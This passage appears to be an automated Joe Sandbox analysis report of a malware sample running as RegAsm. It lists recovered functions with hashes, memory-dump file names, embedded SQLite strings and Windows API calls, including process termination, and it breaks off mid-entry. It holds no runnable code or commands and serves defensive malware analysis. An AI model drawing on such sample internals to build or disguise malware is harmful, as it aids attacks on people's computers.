Instruction Fuzzy Hash: 127112769142119BD700DF28CC80B5BB7F8FF44B18F0C5569F8899B291EB35E90D8BA2

Uniqueness

Uniqueness Score: -1.00%

Function 19A7B980 Relevance: 16.7, APIs: 11, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e71896ed273b7475ea7c95d6aac010e81904d0e0d35024b5b6fab7a22bfea8b
Instruction ID: 5d00d0f20ac3c4350ee45f73aad91c1f24b6e2d75d4bc09ad16a7e60c1117354
Opcode Fuzzy Hash: 8e71896ed273b7475ea7c95d6aac010e81904d0e0d35024b5b6fab7a22bfea8b
Instruction Fuzzy Hash: 728167F58043828BC7098F20C84772ABBA8AF85B04F4C457DEE9557296E733E84DC792

Uniqueness

Uniqueness Score: -1.00%

Function 19ABF600 Relevance: 16.7, APIs: 11, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction ID: 5c56a1e3d11cec88de88f1398594f983a9b57570f9f1baef248d38b3a1a7b247
Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
Instruction Fuzzy Hash: 9C511176A04302ABD700DE14DC80B6BB7ECEF84B14F48056DFD459B291E726BA5D87E2

Uniqueness

Uniqueness Score: -1.00%

Function 19AE1940 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 345COMMON

Download Yara Rule

Strings

misuse, xrefs: 19AE1B21
block, xrefs: 19AE1A90
%s at line %d of [%.10s], xrefs: 19AE1B26
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19AE1B17

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-4016964285
Opcode ID: 9008e1ea79fb4db3f51a0264f56e7584a486d7262d0f709064c7081b114bf68c
Instruction ID: 1c7801c1e63454f029074a43b9de929404b7132528f87351e60350293ea61482
Opcode Fuzzy Hash: 9008e1ea79fb4db3f51a0264f56e7584a486d7262d0f709064c7081b114bf68c
Instruction Fuzzy Hash: 95C1F4B49002759FCB10CF24CC84AAA7BE9FF44B14F494569FC899B251E731F919CB92

Uniqueness

Uniqueness Score: -1.00%

Function 19A8FED0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

no more rows available, xrefs: 19A9006F
another row available, xrefs: 19A90076, 19A90081
%llu, xrefs: 19A8FFF7
%llu, xrefs: 19A8FF3C
abort due to ROLLBACK, xrefs: 19A90068
unknown error, xrefs: 19A9003E

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
API String ID: 0-1539118790
Opcode ID: 786f105d698fa18a35006c6d8d415431a045fe33661a5e15671797f5f59a5a29
Instruction ID: 8ffe9a7c6a7944c6bd8a0ea21d3fa7156a7fc08b51faa48c6af02dbff3be4f0e
Opcode Fuzzy Hash: 786f105d698fa18a35006c6d8d415431a045fe33661a5e15671797f5f59a5a29
Instruction Fuzzy Hash: BE9149316403218BC704CF28CC80BAAB7E5FF85B58F58456DF9899B391D736E84AC792

Uniqueness

Uniqueness Score: -1.00%

Function 19B970B0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 227COMMON

Download Yara Rule

Strings

misuse, xrefs: 19B97217
API called with finalized prepared statement, xrefs: 19B97201
%s at line %d of [%.10s], xrefs: 19B9721C
orphan index, xrefs: 19B972C2
invalid rootpage, xrefs: 19B9715C, 19B9730E
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B9720D

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
API String ID: 0-165706444
Opcode ID: fab74b73394939e1958c41deff15a6ab62ef9050b82c36e2b58b4cd4ec880b7a
Instruction ID: e8eb1c945f7b58c0171bf0d2ba5e8659b23f14e8cc2292cb363143a451a7ac90
Opcode Fuzzy Hash: fab74b73394939e1958c41deff15a6ab62ef9050b82c36e2b58b4cd4ec880b7a
Instruction Fuzzy Hash: 6D6169F5A353916BD7218A60ACC0F9B77D9DF82219F1C84B9ED45861C2E321F149C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19A83A50 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 172COMMON

Download Yara Rule

Strings

no such schema, xrefs: 19A83BEA
cannot delete, xrefs: 19A83A82
cannot insert, xrefs: 19A83BF1, 19A83C52
read-only, xrefs: 19A83A71
bad page value, xrefs: 19A83BDC
bad page number, xrefs: 19A83BE3

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
API String ID: 0-1499782803
Opcode ID: d9542ee906786f5ca1ff895d89a36891f102d1511fbf84154e50cfb858aa47f3
Instruction ID: 7e3e5b68f0c304281bb3e01bb04dced93281b9f2e8fd7fa12b533121a516f02a
Opcode Fuzzy Hash: d9542ee906786f5ca1ff895d89a36891f102d1511fbf84154e50cfb858aa47f3
Instruction Fuzzy Hash: 5D5108B5A042509BDB00CF14D88DB1B77ADEF40F56F1D44A9F8898B2A1EB36E84DC752

Uniqueness

Uniqueness Score: -1.00%

Function 19B9B0E0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 117COMMON

Download Yara Rule

Strings

misuse, xrefs: 19B9B112
invalid, xrefs: 19B9B13E
unopened, xrefs: 19B9B145
%s at line %d of [%.10s], xrefs: 19B9B117
NULL, xrefs: 19B9B0F4
API call with %s database connection pointer, xrefs: 19B9B0F9
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B9B108

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-538076154
Opcode ID: cbae5868a281dede876908ac5ddeef6a5e9d42b7e25cbccac80ddccdfef3107b
Instruction ID: 0a1af66944c1335818da4bb1650a9887dc978436559fe1447f0741e3a686adcc
Opcode Fuzzy Hash: cbae5868a281dede876908ac5ddeef6a5e9d42b7e25cbccac80ddccdfef3107b
Instruction Fuzzy Hash: 4031BAF54383B4ABD7104A64AC40A9B7B9AEF8532CFCC0538F8E562181E371E505C3A3

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(75AA5460,?,75AA5460,00000000,?,0040C0A5,0040C8C0,?,0040C8C0,?,75AA5460,00000000), ref: 0040BF5F
strchr.MSVCRT ref: 0040BF75
strchr.MSVCRT ref: 0040BFA6
lstrlen.KERNEL32(75AA5460,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75AA5460,00000000), ref: 0040BFC6
GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75AA5460,00000000), ref: 0040BFD7
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75AA5460,00000000), ref: 0040BFDE
lstrlen.KERNEL32(75AA5460,?,?,?,?,?,0040C0A5,0040C8C0,?,0040C8C0,?,75AA5460,00000000), ref: 0040BFEE
strcpy_s.MSVCRT ref: 0040C01A

Strings

0123456789ABCDEF, xrefs: 0040BF2B

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Heapstrchr$AllocProcessstrcpy_s
String ID: 0123456789ABCDEF
API String ID: 4020929367-2554083253
Opcode ID: fd006f9b56bc7ef8a4b9ae5c8e524a07b9f310a438a39e7189a40d8a275efe6b
Instruction ID: 5966ea1f0e642e750bc4dd4ac55007b62af0bfa430af95c807717a58a61a9fb0
Opcode Fuzzy Hash: fd006f9b56bc7ef8a4b9ae5c8e524a07b9f310a438a39e7189a40d8a275efe6b
Instruction Fuzzy Hash: DE31B676A002059FC710DFA9DC45BAEBBB9EF8D714F40416AF919E7381D7389901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 19ABF4B0 Relevance: 15.1, APIs: 10, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction ID: 2973f9fc1d102080f29bc5dbd7b70b7d16ea98b1ab30aa3a3e0e531b8ed0ed1a
Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
Instruction Fuzzy Hash: 352194AA90035277E302AE209E01FAF629C5F41A16F0D8958FD16A5191F725F64D43B3

Uniqueness

Uniqueness Score: -1.00%

Function 19B7FB30 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 324COMMON

Download Yara Rule

Strings

misuse, xrefs: 19B7FBA0
API called with finalized prepared statement, xrefs: 19B7FB7A
%s at line %d of [%.10s], xrefs: 19B7FBA5
API called with NULL prepared statement, xrefs: 19B7FB65
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B7FB96

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 6244d9e69a8f48f3b1dbe7b3812c606d32c1e4b69310b7546c9e246bc033ffdf
Instruction ID: 566b58f2caba61a12104747de1d6059b0faa820f9f8e0fdd1d56cf7f1ed0c1de
Opcode Fuzzy Hash: 6244d9e69a8f48f3b1dbe7b3812c606d32c1e4b69310b7546c9e246bc033ffdf
Instruction Fuzzy Hash: ECB1E0B49047419FE7248F34D845B577BE5FF44718F084A2CE8AA872C1E775E409CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 19AF1710 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 235COMMON

Download Yara Rule

Strings

CREATE TABLE x(, xrefs: 19AF17D9
%z, %Q HIDDEN, %s HIDDEN), xrefs: 19AF1831
%z%s%Q, xrefs: 19AF180D
rank, xrefs: 19AF1824

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %z%s%Q$%z, %Q HIDDEN, %s HIDDEN)$CREATE TABLE x($rank
API String ID: 0-3324442540
Opcode ID: 6b99a7592cf9e39447cb11201f0ed3fcfe2dff2bbe8a98935f43dc8a8cbd9b8b
Instruction ID: d64908d26919d3555097f99ae2e8b94a3e1487ce81b0f5dcd1857eb089dd7fa1
Opcode Fuzzy Hash: 6b99a7592cf9e39447cb11201f0ed3fcfe2dff2bbe8a98935f43dc8a8cbd9b8b
Instruction Fuzzy Hash: 71811471A002659FDB008F24DC80E5FB7E8FF45A59F080669FC89A7260E735E815CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 19B674A0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 175COMMON

Download Yara Rule

Strings

misuse, xrefs: 19B674D7
invalid, xrefs: 19B674BC
%s at line %d of [%.10s], xrefs: 19B674DC
unable to close due to unfinalized statements or unfinished backups, xrefs: 19B675D1
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B674CD
API call with %s database connection pointer, xrefs: 19B674C1

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 0-3800776574
Opcode ID: fbcd6c1032365420228c745d4a2fcbfb2289b70b06a626cd06d00e7531f4e168
Instruction ID: c79c15e600a4eb70cf57421b95bd8013e588015946eb78e23322b54c9a57387b
Opcode Fuzzy Hash: fbcd6c1032365420228c745d4a2fcbfb2289b70b06a626cd06d00e7531f4e168
Instruction Fuzzy Hash: 32512675900761ABD310DB38ECC4B9B77A5EF40A14F0D40A8E89D932A1F734F556C6A7

Uniqueness

Uniqueness Score: -1.00%

Function 00411AA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411AD5
GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
wsprintfW.USER32 ref: 00411B1C
OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
CloseHandle.KERNEL32(00000000), ref: 00411B93

Strings

%hs, xrefs: 00411B16

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID: %hs
API String ID: 396451647-2783943728
Opcode ID: 2a9af94ab51f1c7612f2706503fe0e7467de995d476e1fae5c9432b40af36c71
Instruction ID: 62e53cf01b74de85e867b82ad9f5ad143882cdd6a93c6f1169250ec35743cbe0
Opcode Fuzzy Hash: 2a9af94ab51f1c7612f2706503fe0e7467de995d476e1fae5c9432b40af36c71
Instruction Fuzzy Hash: BD31B2B6900209ABDB10DF94DC85FEFB779EF0A700F50412AF609A7190E7385E85CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 19B0BCF0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON

Download Yara Rule

Strings

undersize RTree blobs in "%q_node", xrefs: 19B0BDA1
PRAGMA %Q.page_size, xrefs: 19B0BD03
SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 19B0BD67

Memory Dump Source

